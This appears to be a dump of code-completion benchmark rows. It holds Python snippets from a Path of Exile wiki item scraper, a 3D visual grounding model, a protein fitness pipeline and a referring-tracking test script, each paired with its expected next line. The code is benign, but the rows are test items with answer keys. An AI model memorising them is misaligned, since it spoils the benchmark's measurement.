"identifier": "League",
"path": "data/leagues.py",
"snippet": "class League:\n type_: LeagueType\n title: str # e.g. \"Ancestor\"\n slug: str # e.g. \"ancestor\"\n is_hardcore: bool"
},
{
"identifier": "NinjaCategory",
"path": "data/ninja.py",
"snippet": "class NinjaIndex... | import http
import itertools
import pprint
from collections.abc import Generator
from tabulate import tabulate
from .leagues import League
from .ninja import NinjaCategory, get_ninja_index, make_ninja_url
from .trade import automake_trade_url
from .types import Rarity
from .utils import Entry, LoggedRequestsSession, make_poedb_url, make_wiki_url | 3,016 | 'Medium Cluster Jewel',
'Small Clorster Jewel',
'Small Cluster Jewel',
'Breach Ring', # always drops rare and corrupted
'Ashscale Talisman', # always drops rare and corrupted
'Avian Twins Talisman', # always drops rare and corrupted
'Black Maw Talisman', # always drops rare and corrupted
'Bonespire Talisman', # always drops rare and corrupted
'Breakrib Talisman', # always drops rare and corrupted
'Chrysalis Talisman', # always drops rare and corrupted
'Clutching Talisman', # always drops rare and corrupted
'Deadhand Talisman', # always drops rare and corrupted
'Deep One Talisman', # always drops rare and corrupted
'Fangjaw Talisman', # always drops rare and corrupted
'Hexclaw Talisman', # always drops rare and corrupted
'Horned Talisman', # always drops rare and corrupted
'Lone Antler Talisman', # always drops rare and corrupted
'Longtooth Talisman', # always drops rare and corrupted
'Mandible Talisman', # always drops rare and corrupted
'Monkey Paw Talisman', # always drops rare and corrupted
'Monkey Twins Talisman', # always drops rare and corrupted
'Primal Skull Talisman', # always drops rare and corrupted
'Rot Head Talisman', # always drops rare and corrupted
'Rotfeather Talisman', # always drops rare and corrupted
'Spinefuse Talisman', # always drops rare and corrupted
'Splitnewt Talisman', # always drops rare and corrupted
'Three Hands Talisman', # always drops rare and corrupted
'Three Rat Talisman', # always drops rare and corrupted
'Undying Flesh Talisman', # always drops rare and corrupted
'Wereclaw Talisman', # always drops rare and corrupted
'Writhing Talisman', # always drops rare and corrupted
"Thief's Trinket", # always drops rare and corrupted
# currency (mostly shards)
'Chaos Orb', # gold standard, so will never be listed
"Facetor's Lens", # price varies by stored experience
'Alchemy Shard',
'Alteration Shard',
'Ancient Shard',
'Bestiary Orb',
'Binding Shard',
'Chaos Shard',
"Engineer's Shard",
'Horizon Shard',
'Imprint',
'Imprinted Bestiary Orb',
'Regal Shard',
'Scroll Fragment',
'Transmutation Shard',
"Harbinger's Shard",
# misc
'Fine Incubator', # low-level version of Ornate Incubator
'Whispering Incubator', # low-level version Infused Incubator
"Gemcutter's Incubator", # superseded by Thaumaturge's Incubator?
'Pale Court Set',
'Blood-filled Vessel',
'Chronicle of Atzoatl',
'Deadly End', # The Tower of Ordeals piece
'Ignominious Fate', # The Tower of Ordeals piece
'Victorious Fate', # The Tower of Ordeals piece
'Will of Chaos', # The Tower of Ordeals piece
'Deregulation Scroll', # upgrades Harbinger items
'Electroshock Scroll', # upgrades Harbinger items
'Fragmentation Scroll', # upgrades Harbinger items
'Haemocombustion Scroll', # upgrades Harbinger items
'Specularity Scroll', # upgrades Harbinger items
'Time-light Scroll', # upgrades Harbinger items
'Ritual Splinter',
*( # non-collectable Expedition artifacts
f'{tier} {faction} Artifact' for tier, faction in itertools.product(
('Lesser', 'Greater', 'Grand', 'Exceptional'),
('Black Scythe', 'Broken Circle', 'Order', 'Sun'),
)
),
}
KNOWN_NINJA_UNLISTED_CLASSES: set[str] = { # wiki item classes that are never listed on ninja
'Monster Organ Sample',
'Voidstone',
'Captured Soul',
'Incursion Item',
'Fishing Rod',
'Expedition Logbook',
"Rogue's Brooch",
"Rogue's Cloak",
"Rogue's Gear",
"Rogue's Tool",
'Heist Target',
'Labyrinth Key',
'Labyrinth Trinket',
'Sanctum Research',
}
def get_items(league: League) -> Generator[Entry, None, None]:
ninja_unknown = []
ninja_index = get_ninja_index(league)
for item in iter_wiki_query(
tables='items',
fields='name,base_item,class,rarity_id,cannot_be_traded_or_modified',
where='drop_enabled=true AND class != "Hideout Decoration" AND class != "Cosmetic Item" AND class != "Quest Item"', # noqa: E501
group_by='name',
):
# unpack result fields
name, base_item, class_, rarity, tradable = (
item['title']['name'],
item['title']['base item'],
item['title']['class'],
Rarity(item['title']['rarity id']),
not bool(int(item['title']['cannot be traded or modified'])),
)
if name in WIKI_ITEM_BLACKLIST:
continue
ninja_category = ninja_index.match(name)
is_known = name in KNOWN_NINJA_UNLISTED_NAMES or class_ in KNOWN_NINJA_UNLISTED_CLASSES
if ninja_category is None and not is_known:
ninja_unknown.append((name, base_item, class_, rarity.value))
|
def iter_wiki_query(**cargo_params: dict[str, str]) -> Generator[dict, None, None]:
page_size = 500
offset = 0
session = LoggedRequestsSession()
while True:
res = session.get(
'https://www.poewiki.net/w/api.php',
params={
'action': 'cargoquery',
'format': 'json',
'offset': offset,
'limit': page_size,
**cargo_params,
},
)
assert res.status_code == http.HTTPStatus.OK
res_decoded = res.json()
try:
result_page = res_decoded['cargoquery']
except KeyError:
# unexpected message format, probably the query was bad.
# print full response for debugging.
pprint.pprint(res_decoded)
raise
result_page_len = len(result_page)
yield from result_page
# partial page indicates that there won't be a next page; stop crawling
if result_page_len < page_size:
break
offset += result_page_len
WIKI_ITEM_BLACKLIST: set[str] = { # items to completely ignore when importing from wiki (e.g. test data)
'Тест',
'Test',
'{{subst:PAGENAME}}',
"Booby Lady's Gloves",
'His Judgement', # seems to be in game files, but smells fishy
}
KNOWN_NINJA_UNLISTED_NAMES: set[str] = { # item names that are never listed on ninja
# non-armour/weapon base types
'Contract: Bunker',
'Contract: Laboratory',
'Contract: Mansion',
'Contract: Prohibited Library',
'Contract: Records Office',
'Contract: Repository',
"Contract: Smuggler's Den",
'Contract: Tunnels',
'Contract: Underbelly',
'Blueprint: Bunker',
'Blueprint: Laboratory',
'Blueprint: Mansion',
'Blueprint: Prohibited Library',
'Blueprint: Records Office',
'Blueprint: Repository',
"Blueprint: Smuggler's Den",
'Blueprint: Tunnels',
'Blueprint: Underbelly',
'Amethyst Flask',
'Aquamarine Flask',
'Basalt Flask',
'Bismuth Flask',
'Corundum Flask',
'Diamond Flask',
'Gold Flask',
'Granite Flask',
'Iron Flask',
'Jade Flask',
'Quartz Flask',
'Quicksilver Flask',
'Ruby Flask',
'Sapphire Flask',
'Silver Flask',
'Stibnite Flask',
'Sulphur Flask',
'Topaz Flask',
'Colossal Life Flask',
'Divine Life Flask',
'Eternal Life Flask',
'Giant Life Flask',
'Grand Life Flask',
'Greater Life Flask',
'Hallowed Life Flask',
'Large Life Flask',
'Medium Life Flask',
'Sacred Life Flask',
'Sanctified Life Flask',
'Small Life Flask',
'Colossal Mana Flask',
'Divine Mana Flask',
'Eternal Mana Flask',
'Giant Mana Flask',
'Grand Mana Flask',
'Greater Mana Flask',
'Hallowed Mana Flask',
'Large Mana Flask',
'Medium Mana Flask',
'Sacred Mana Flask',
'Sanctified Mana Flask',
'Small Mana Flask',
'Colossal Hybrid Flask',
'Hallowed Hybrid Flask',
'Large Hybrid Flask',
'Medium Hybrid Flask',
'Sacred Hybrid Flask',
'Small Hybrid Flask',
'Candlestick Relic',
'Censer Relic',
'Coffer Relic',
'Papyrus Relic',
'Processional Relic',
'Tome Relic',
'Urn Relic',
'Large Cluster Jewel',
'Medium Cluster Jewel',
'Small Clorster Jewel',
'Small Cluster Jewel',
'Breach Ring', # always drops rare and corrupted
'Ashscale Talisman', # always drops rare and corrupted
'Avian Twins Talisman', # always drops rare and corrupted
'Black Maw Talisman', # always drops rare and corrupted
'Bonespire Talisman', # always drops rare and corrupted
'Breakrib Talisman', # always drops rare and corrupted
'Chrysalis Talisman', # always drops rare and corrupted
'Clutching Talisman', # always drops rare and corrupted
'Deadhand Talisman', # always drops rare and corrupted
'Deep One Talisman', # always drops rare and corrupted
'Fangjaw Talisman', # always drops rare and corrupted
'Hexclaw Talisman', # always drops rare and corrupted
'Horned Talisman', # always drops rare and corrupted
'Lone Antler Talisman', # always drops rare and corrupted
'Longtooth Talisman', # always drops rare and corrupted
'Mandible Talisman', # always drops rare and corrupted
'Monkey Paw Talisman', # always drops rare and corrupted
'Monkey Twins Talisman', # always drops rare and corrupted
'Primal Skull Talisman', # always drops rare and corrupted
'Rot Head Talisman', # always drops rare and corrupted
'Rotfeather Talisman', # always drops rare and corrupted
'Spinefuse Talisman', # always drops rare and corrupted
'Splitnewt Talisman', # always drops rare and corrupted
'Three Hands Talisman', # always drops rare and corrupted
'Three Rat Talisman', # always drops rare and corrupted
'Undying Flesh Talisman', # always drops rare and corrupted
'Wereclaw Talisman', # always drops rare and corrupted
'Writhing Talisman', # always drops rare and corrupted
"Thief's Trinket", # always drops rare and corrupted
# currency (mostly shards)
'Chaos Orb', # gold standard, so will never be listed
"Facetor's Lens", # price varies by stored experience
'Alchemy Shard',
'Alteration Shard',
'Ancient Shard',
'Bestiary Orb',
'Binding Shard',
'Chaos Shard',
"Engineer's Shard",
'Horizon Shard',
'Imprint',
'Imprinted Bestiary Orb',
'Regal Shard',
'Scroll Fragment',
'Transmutation Shard',
"Harbinger's Shard",
# misc
'Fine Incubator', # low-level version of Ornate Incubator
'Whispering Incubator', # low-level version Infused Incubator
"Gemcutter's Incubator", # superseded by Thaumaturge's Incubator?
'Pale Court Set',
'Blood-filled Vessel',
'Chronicle of Atzoatl',
'Deadly End', # The Tower of Ordeals piece
'Ignominious Fate', # The Tower of Ordeals piece
'Victorious Fate', # The Tower of Ordeals piece
'Will of Chaos', # The Tower of Ordeals piece
'Deregulation Scroll', # upgrades Harbinger items
'Electroshock Scroll', # upgrades Harbinger items
'Fragmentation Scroll', # upgrades Harbinger items
'Haemocombustion Scroll', # upgrades Harbinger items
'Specularity Scroll', # upgrades Harbinger items
'Time-light Scroll', # upgrades Harbinger items
'Ritual Splinter',
*( # non-collectable Expedition artifacts
f'{tier} {faction} Artifact' for tier, faction in itertools.product(
('Lesser', 'Greater', 'Grand', 'Exceptional'),
('Black Scythe', 'Broken Circle', 'Order', 'Sun'),
)
),
}
KNOWN_NINJA_UNLISTED_CLASSES: set[str] = { # wiki item classes that are never listed on ninja
'Monster Organ Sample',
'Voidstone',
'Captured Soul',
'Incursion Item',
'Fishing Rod',
'Expedition Logbook',
"Rogue's Brooch",
"Rogue's Cloak",
"Rogue's Gear",
"Rogue's Tool",
'Heist Target',
'Labyrinth Key',
'Labyrinth Trinket',
'Sanctum Research',
}
def get_items(league: League) -> Generator[Entry, None, None]:
ninja_unknown = []
ninja_index = get_ninja_index(league)
for item in iter_wiki_query(
tables='items',
fields='name,base_item,class,rarity_id,cannot_be_traded_or_modified',
where='drop_enabled=true AND class != "Hideout Decoration" AND class != "Cosmetic Item" AND class != "Quest Item"', # noqa: E501
group_by='name',
):
# unpack result fields
name, base_item, class_, rarity, tradable = (
item['title']['name'],
item['title']['base item'],
item['title']['class'],
Rarity(item['title']['rarity id']),
not bool(int(item['title']['cannot be traded or modified'])),
)
if name in WIKI_ITEM_BLACKLIST:
continue
ninja_category = ninja_index.match(name)
is_known = name in KNOWN_NINJA_UNLISTED_NAMES or class_ in KNOWN_NINJA_UNLISTED_CLASSES
if ninja_category is None and not is_known:
ninja_unknown.append((name, base_item, class_, rarity.value))
| display_text = name if ninja_category is not NinjaCategory.UNIQUE_MAPS else f'{name} {base_item}' | 1 | 2023-10-27 11:33:43+00:00 | 4k |
ATR-DBI/CityRefer | models/refnet.py | [
{
"identifier": "MultiHeadAttention",
"path": "models/transformer.py",
"snippet": "class MultiHeadAttention(nn.Module):\n '''\n Multi-head attention layer with Dropout and Layer Normalization.\n '''\n\n def __init__(self, d_model, d_k, d_v, h, dropout=.1, identity_map_reordering=False, can_b... | import random
import torch
import torch.nn as nn
import torchsparse.nn as spnn
from torch.nn.utils.rnn import pad_sequence
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
from torchsparse.utils.collate import sparse_collate
from models.transformer import MultiHeadAttention
from models.basic_blocks import SparseConvEncoder
from models.landlang_module import LandLangModule | 2,012 |
#from models.lang_module import LangModule
class RefNet(nn.Module):
def __init__(self, args, input_feature_dim=0, num_object_class=None, vocab_size=None, pad_token_id=0):
super().__init__()
self.args = args
self.num_object_class = num_object_class
self.match_type = args.match_type
self.num_proposal = args.max_num_object if args.num_cands < 0 else args.num_cands # self.max_num_object
self.use_lang_classifier=(not args.no_lang_cls)
self.drop_rate = args.drop_rate
hidden_size = args.hidden_size
# --------- Point Encoder ---------
# Sparse Volumetric Backbone
|
#from models.lang_module import LangModule
class RefNet(nn.Module):
def __init__(self, args, input_feature_dim=0, num_object_class=None, vocab_size=None, pad_token_id=0):
super().__init__()
self.args = args
self.num_object_class = num_object_class
self.match_type = args.match_type
self.num_proposal = args.max_num_object if args.num_cands < 0 else args.num_cands # self.max_num_object
self.use_lang_classifier=(not args.no_lang_cls)
self.drop_rate = args.drop_rate
hidden_size = args.hidden_size
# --------- Point Encoder ---------
# Sparse Volumetric Backbone | self.sparse_conv = SparseConvEncoder(input_feature_dim) # self.input_feature_dim = 3 -> 128 | 1 | 2023-10-25 10:02:28+00:00 | 4k |
OATML-Markslab/ProteinNPT | baselines/data_processing.py | [
{
"identifier": "slice_sequences",
"path": "utils/data_utils.py",
"snippet": "def slice_sequences(list_mutant_mutated_seq_pairs, max_positions=1024, method=\"rolling\", rolling_overlap=100, eval_mode=True, batch_target_labels=None, batch_masked_targets=None, target_names=None, start_idx=1, num_extra_tok... | import sys
import numpy as np
import h5py
import torch
from collections import defaultdict
from utils.data_utils import slice_sequences, get_indices_retrieved_embeddings
from utils.msa_utils import weighted_sample_MSA | 1,663 |
def process_batch(batch, model, alphabet, args, device, MSA_sequences=None, MSA_weights=None, MSA_start_position=None, MSA_end_position=None, eval_mode = True, indel_mode=False, start_idx=1):
"""
start_idx is the one-indexed postion of the first residue in the sequence. If full sequence is passed (as always assumed in this codebase) this is equal to 1.
"""
target_names = args.target_config.keys()
raw_sequence_length = len(batch['mutant_mutated_seq_pairs'][0][1])
raw_batch_size = len(batch['mutant_mutated_seq_pairs'])
if args.sequence_embeddings_location is not None and args.aa_embeddings!="One_hot_encoding":
try:
indices_retrieved_embeddings = get_indices_retrieved_embeddings(batch,args.sequence_embeddings_location)
assert len(indices_retrieved_embeddings)==raw_batch_size, "At least one embedding was missing"
with h5py.File(args.sequence_embeddings_location, 'r') as h5f:
sequence_embeddings = torch.tensor(np.array([h5f['embeddings'][i] for i in indices_retrieved_embeddings])).float()
except:
print("Error loading main sequence embeddings")
sys.exit(0)
else:
sequence_embeddings = None
batch_target_labels = defaultdict(list)
for target_name in target_names: batch_target_labels[target_name] = batch[target_name].to(device)
if args.augmentation=="zero_shot_fitness_predictions_covariate": batch_target_labels['zero_shot_fitness_predictions'] = batch['zero_shot_fitness_predictions'].to(device)
if args.aa_embeddings=="MSA_Transformer":
# If MSAT and MSA does not cover full sequence length, we chop off all sequences to be scored as needed so that everything lines up properly.
if (MSA_start_position is not None) and (MSA_end_position is not None) and ((MSA_start_position > 1) or (MSA_end_position < raw_sequence_length)) and args.sequence_embeddings_location is None:
MSA_start_index = MSA_start_position - 1
MSA_end_index = MSA_end_position
batch['mutant_mutated_seq_pairs'] = [ (mutant,seq[MSA_start_index:MSA_end_index]) for (mutant,seq) in batch['mutant_mutated_seq_pairs']]
# Recompute sequence length (has potentially been chopped off above)
raw_sequence_length = len(batch['mutant_mutated_seq_pairs'][0][1])
#Sample MSA sequences as needed
if args.sequence_embeddings_location is None and args.num_MSA_sequences_per_training_instance > 0:
assert MSA_weights is not None, "Trying to add MSA_sequences to scoring batch but no weights are provided"
if model.MSA_sample_sequences is None:
|
def process_batch(batch, model, alphabet, args, device, MSA_sequences=None, MSA_weights=None, MSA_start_position=None, MSA_end_position=None, eval_mode = True, indel_mode=False, start_idx=1):
"""
start_idx is the one-indexed postion of the first residue in the sequence. If full sequence is passed (as always assumed in this codebase) this is equal to 1.
"""
target_names = args.target_config.keys()
raw_sequence_length = len(batch['mutant_mutated_seq_pairs'][0][1])
raw_batch_size = len(batch['mutant_mutated_seq_pairs'])
if args.sequence_embeddings_location is not None and args.aa_embeddings!="One_hot_encoding":
try:
indices_retrieved_embeddings = get_indices_retrieved_embeddings(batch,args.sequence_embeddings_location)
assert len(indices_retrieved_embeddings)==raw_batch_size, "At least one embedding was missing"
with h5py.File(args.sequence_embeddings_location, 'r') as h5f:
sequence_embeddings = torch.tensor(np.array([h5f['embeddings'][i] for i in indices_retrieved_embeddings])).float()
except:
print("Error loading main sequence embeddings")
sys.exit(0)
else:
sequence_embeddings = None
batch_target_labels = defaultdict(list)
for target_name in target_names: batch_target_labels[target_name] = batch[target_name].to(device)
if args.augmentation=="zero_shot_fitness_predictions_covariate": batch_target_labels['zero_shot_fitness_predictions'] = batch['zero_shot_fitness_predictions'].to(device)
if args.aa_embeddings=="MSA_Transformer":
# If MSAT and MSA does not cover full sequence length, we chop off all sequences to be scored as needed so that everything lines up properly.
if (MSA_start_position is not None) and (MSA_end_position is not None) and ((MSA_start_position > 1) or (MSA_end_position < raw_sequence_length)) and args.sequence_embeddings_location is None:
MSA_start_index = MSA_start_position - 1
MSA_end_index = MSA_end_position
batch['mutant_mutated_seq_pairs'] = [ (mutant,seq[MSA_start_index:MSA_end_index]) for (mutant,seq) in batch['mutant_mutated_seq_pairs']]
# Recompute sequence length (has potentially been chopped off above)
raw_sequence_length = len(batch['mutant_mutated_seq_pairs'][0][1])
#Sample MSA sequences as needed
if args.sequence_embeddings_location is None and args.num_MSA_sequences_per_training_instance > 0:
assert MSA_weights is not None, "Trying to add MSA_sequences to scoring batch but no weights are provided"
if model.MSA_sample_sequences is None: | model.MSA_sample_sequences = weighted_sample_MSA( | 2 | 2023-10-28 11:41:05+00:00 | 4k |
dyhBUPT/iKUN | test.py | [
{
"identifier": "opt",
"path": "opts.py",
"snippet": "class opts:\n def __init__(self):\n def parse(self, args=''):"
},
{
"identifier": "get_model",
"path": "model.py",
"snippet": "def get_model(opt, name='Model'):\n model = eval(name)(opt)\n model.cuda()\n model = nn.Data... | import os
import json
import shutil
import numpy as np
import torch
import torch.nn.functional as F
import warnings
from tqdm import tqdm
from os.path import join, exists
from collections import defaultdict
from torch import nn
from torchvision.utils import save_image
from opts import opt
from utils import *
from model import get_model
from dataloader import get_dataloader, get_transform
from similarity_calibration import similarity_calibration | 2,691 | if save_img:
local_img = data['cropped_images'].squeeze(0)
global_img = data['global_images'].squeeze(0)
local_img = F.interpolate(local_img, global_img.size()[2:])
imgs = un_norm(
torch.cat(
(local_img, global_img),
dim=0
)
)
imgs = imgs.repeat(len(expressions), 1, 1, 1, 1)
for i in range(len(imgs)):
file_name = '{}_{}_{:.0f}_{:.2f}.jpg'.format(
global_idx,
expressions[i].replace(' ', '-'),
labels[i],
logits[i]
)
save_image(
imgs[i],
join(save_dir, file_name)
)
global_idx += 1
PRECISION = TP / (TP + FP) * 100
RECALL = TP / (TP + FN) * 100
print(TP, FP, FN)
return PRECISION, RECALL
def test_tracking(model, dataloader):
print('========== Testing Tracking ==========')
model.eval()
OUTPUTS = multi_dim_dict(4, list)
with torch.no_grad():
for batch_idx, data in enumerate(tqdm(dataloader)):
# forward
inputs = dict(
local_img=data['cropped_images'].cuda(),
global_img=data['global_images'].cuda(),
exp=tokenize(data['expression_new']).cuda(),
)
similarity = model(inputs)['logits'].cpu()
for idx in range(len(data['video'])):
for frame_id in range(data['start_frame'][idx], data['stop_frame'][idx] + 1):
frame_dict = OUTPUTS[data['video'][idx]][int(data['obj_id'][idx])][int(frame_id)]
frame_dict[data['expression_raw'][idx]].append(similarity[idx].cpu().numpy().tolist())
return OUTPUTS
def generate_final_results(cls_dict, data_dir, track_dir, save_dir, thr_score=0.):
"""
给定`test_tracking`输出的结果,生成最终跟踪结果
- cls_dict: video->id->frame->exp->
"""
template_dir = join(data_dir, 'gt_template')
if exists(save_dir):
shutil.rmtree(save_dir)
for video in os.listdir(template_dir):
if video not in cls_dict:
continue
video_dir_in = join(template_dir, video)
video_dir_out = join(save_dir, video)
MIN_FRAME, MAX_FRAME = FRAMES[video]
# symbolic link for `gt.txt`
for exp in os.listdir(video_dir_in):
exp_dir_in = join(video_dir_in, exp)
exp_dir_out = join(video_dir_out, exp)
os.makedirs(exp_dir_out, exist_ok=True)
gt_path_in = join(exp_dir_in, 'gt.txt')
gt_path_out = join(exp_dir_out, 'gt.txt' )
if not exists(gt_path_out):
os.symlink(gt_path_in, gt_path_out)
# load tracks
# noinspection PyBroadException
try:
tracks = np.loadtxt(join(track_dir, video, 'all', 'gt.txt'), delimiter=',')
except:
tracks_1 = np.loadtxt(join(track_dir, video, 'car', 'predict.txt'), delimiter=',')
if len(tracks_1.shape) == 2:
tracks = tracks_1
max_obj_id = max(tracks_1[:, 1])
else:
tracks = np.empty((0, 10))
max_obj_id = 0
tracks_2 = np.loadtxt(join(track_dir, video, 'pedestrian', 'predict.txt'), delimiter=',')
if len(tracks_2.shape) == 2:
tracks_2[:, 1] += max_obj_id
tracks = np.concatenate((tracks, tracks_2), axis=0)
# generate `predict.txt`
video_dict = cls_dict[video]
for obj_id, obj_dict in video_dict.items():
for frame_id, frame_dict in obj_dict.items():
for exp in EXPRESSIONS[video]:
if exp in EXPRESSIONS['dropped']:
continue
if exp not in frame_dict: # TODO:可删
continue
exp_dir_out = join(video_dir_out, exp)
score = np.mean(frame_dict[exp])
with open(join(exp_dir_out, 'predict.txt'), 'a') as f:
if score > thr_score:
bbox = tracks[
(tracks[:, 0] == int(frame_id)) *
(tracks[:, 1] == int(obj_id))
][0]
assert bbox.shape in ((9, ), (10, ))
if MIN_FRAME < bbox[0] < MAX_FRAME: # TODO
# the min/max frame is not included in `gt.txt`
f.write(','.join(list(map(str, bbox))) + '\n')
if __name__ == '__main__':
print(
'========== Testing (Text-Guided {}) =========='
.format('ON' if opt.kum_mode else 'OFF')
)
output_path = join(opt.save_root, opt.exp_name, f'results{opt.save_postfix}.json')
if not exists(output_path):
|
warnings.filterwarnings('ignore')
# import `opts` first to set gpus
def test_accuracy_v1(model, dataloader, save_img=False):
model.eval()
TP, FP, FN = 0, 0, 0
assert dataloader.batch_size == 1
if save_img:
save_dir = join(opt.save_dir, 'images')
os.makedirs(save_dir, exist_ok=True)
global_idx = 1
un_norm = get_transform('unnorm', opt, -1)
with torch.no_grad():
for batch_idx, data in enumerate(tqdm(dataloader)):
# for batch_idx, data in enumerate(dataloader):
# load
expressions = data['target_expressions']
expressions = expressions[0].split(',')
labels = data['target_labels'][0]
images = data['cropped_images']
images = images.repeat_interleave(len(expressions), dim=0)
# forward
inputs = dict(
img=images.cuda(),
exp=tokenize(expressions).cuda(),
)
logits = model(inputs).cpu()
# evaluate
TP += ((logits >= 0) * (labels == 1)).sum()
FP += ((logits >= 0) * (labels == 0)).sum()
FN += ((logits < 0) * (labels == 1)).sum()
# save images
if save_img:
imgs = un_norm(inputs['img'])
for i in range(len(imgs)):
file_name = '{}_{}_{:.0f}_{:.2f}.jpg'.format(
global_idx,
expressions[i].replace(' ', '-'),
labels[i],
logits[i]
)
save_image(
imgs[i],
join(save_dir, file_name)
)
global_idx += 1
PRECISION = TP / (TP + FP) * 100
RECALL = TP / (TP + FN) * 100
return PRECISION, RECALL
def test_accuracy(model, dataloader, save_img=False):
model.eval()
TP, FP, FN = 0, 0, 0
assert dataloader.batch_size == 1
if save_img:
save_dir = join(opt.save_dir, 'images')
os.makedirs(save_dir, exist_ok=True)
global_idx = 1
un_norm = get_transform('unnorm', opt, -1)
with torch.no_grad():
for batch_idx, data in enumerate(tqdm(dataloader)):
# for batch_idx, data in enumerate(dataloader):
# load
expressions = data['target_expressions']
expressions = expressions[0].split(',')
labels = data['target_labels'][0]
# forward
inputs = dict(
local_img=data['cropped_images'].cuda().repeat_interleave(len(expressions), dim=0),
global_img=data['global_images'].cuda().repeat_interleave(len(expressions), dim=0),
exp=tokenize(expressions).cuda(),
)
logits = model(inputs)['logits'].cpu()
# evaluate
TP += ((logits >= 0) * (labels == 1)).sum()
FP += ((logits >= 0) * (labels == 0)).sum()
FN += ((logits < 0) * (labels == 1)).sum()
# save images
if save_img:
local_img = data['cropped_images'].squeeze(0)
global_img = data['global_images'].squeeze(0)
local_img = F.interpolate(local_img, global_img.size()[2:])
imgs = un_norm(
torch.cat(
(local_img, global_img),
dim=0
)
)
imgs = imgs.repeat(len(expressions), 1, 1, 1, 1)
for i in range(len(imgs)):
file_name = '{}_{}_{:.0f}_{:.2f}.jpg'.format(
global_idx,
expressions[i].replace(' ', '-'),
labels[i],
logits[i]
)
save_image(
imgs[i],
join(save_dir, file_name)
)
global_idx += 1
PRECISION = TP / (TP + FP) * 100
RECALL = TP / (TP + FN) * 100
print(TP, FP, FN)
return PRECISION, RECALL
def test_tracking(model, dataloader):
print('========== Testing Tracking ==========')
model.eval()
OUTPUTS = multi_dim_dict(4, list)
with torch.no_grad():
for batch_idx, data in enumerate(tqdm(dataloader)):
# forward
inputs = dict(
local_img=data['cropped_images'].cuda(),
global_img=data['global_images'].cuda(),
exp=tokenize(data['expression_new']).cuda(),
)
similarity = model(inputs)['logits'].cpu()
for idx in range(len(data['video'])):
for frame_id in range(data['start_frame'][idx], data['stop_frame'][idx] + 1):
frame_dict = OUTPUTS[data['video'][idx]][int(data['obj_id'][idx])][int(frame_id)]
frame_dict[data['expression_raw'][idx]].append(similarity[idx].cpu().numpy().tolist())
return OUTPUTS
def generate_final_results(cls_dict, data_dir, track_dir, save_dir, thr_score=0.):
"""
给定`test_tracking`输出的结果,生成最终跟踪结果
- cls_dict: video->id->frame->exp->
"""
template_dir = join(data_dir, 'gt_template')
if exists(save_dir):
shutil.rmtree(save_dir)
for video in os.listdir(template_dir):
if video not in cls_dict:
continue
video_dir_in = join(template_dir, video)
video_dir_out = join(save_dir, video)
MIN_FRAME, MAX_FRAME = FRAMES[video]
# symbolic link for `gt.txt`
for exp in os.listdir(video_dir_in):
exp_dir_in = join(video_dir_in, exp)
exp_dir_out = join(video_dir_out, exp)
os.makedirs(exp_dir_out, exist_ok=True)
gt_path_in = join(exp_dir_in, 'gt.txt')
gt_path_out = join(exp_dir_out, 'gt.txt' )
if not exists(gt_path_out):
os.symlink(gt_path_in, gt_path_out)
# load tracks
# noinspection PyBroadException
try:
tracks = np.loadtxt(join(track_dir, video, 'all', 'gt.txt'), delimiter=',')
except:
tracks_1 = np.loadtxt(join(track_dir, video, 'car', 'predict.txt'), delimiter=',')
if len(tracks_1.shape) == 2:
tracks = tracks_1
max_obj_id = max(tracks_1[:, 1])
else:
tracks = np.empty((0, 10))
max_obj_id = 0
tracks_2 = np.loadtxt(join(track_dir, video, 'pedestrian', 'predict.txt'), delimiter=',')
if len(tracks_2.shape) == 2:
tracks_2[:, 1] += max_obj_id
tracks = np.concatenate((tracks, tracks_2), axis=0)
# generate `predict.txt`
video_dict = cls_dict[video]
for obj_id, obj_dict in video_dict.items():
for frame_id, frame_dict in obj_dict.items():
for exp in EXPRESSIONS[video]:
if exp in EXPRESSIONS['dropped']:
continue
if exp not in frame_dict: # TODO:可删
continue
exp_dir_out = join(video_dir_out, exp)
score = np.mean(frame_dict[exp])
with open(join(exp_dir_out, 'predict.txt'), 'a') as f:
if score > thr_score:
bbox = tracks[
(tracks[:, 0] == int(frame_id)) *
(tracks[:, 1] == int(obj_id))
][0]
assert bbox.shape in ((9, ), (10, ))
if MIN_FRAME < bbox[0] < MAX_FRAME: # TODO
# the min/max frame is not included in `gt.txt`
f.write(','.join(list(map(str, bbox))) + '\n')
if __name__ == '__main__':
print(
'========== Testing (Text-Guided {}) =========='
.format('ON' if opt.kum_mode else 'OFF')
)
output_path = join(opt.save_root, opt.exp_name, f'results{opt.save_postfix}.json')
if not exists(output_path): | model = get_model(opt, 'Model') | 1 | 2023-10-31 07:08:37+00:00 | 4k |
Subsets and Splits
SQL Console for tianyang/repobench_python_v1.1
Identifies repositories that have consistent code formatting levels across multiple scales (2k, 4k, 8k, 12k) and reveals the structured formatting patterns within these repositories.
SQL Console for tianyang/repobench_python_v1.1
Compares cross-file and in-file code structure patterns across different complexity levels, revealing how file organization strategies vary with code size and potentially informing better code architecture decisions.
SQL Console for tianyang/repobench_python_v1.1
Identifies repositories that have complete performance data across all seven code complexity levels, revealing consistent benchmarking patterns across different code sizes.
SQL Console for tianyang/repobench_python_v1.1
Identifies repositories that contain all 7 distinct quality levels (2k through 32k), revealing complete datasets that might be useful for comprehensive analysis.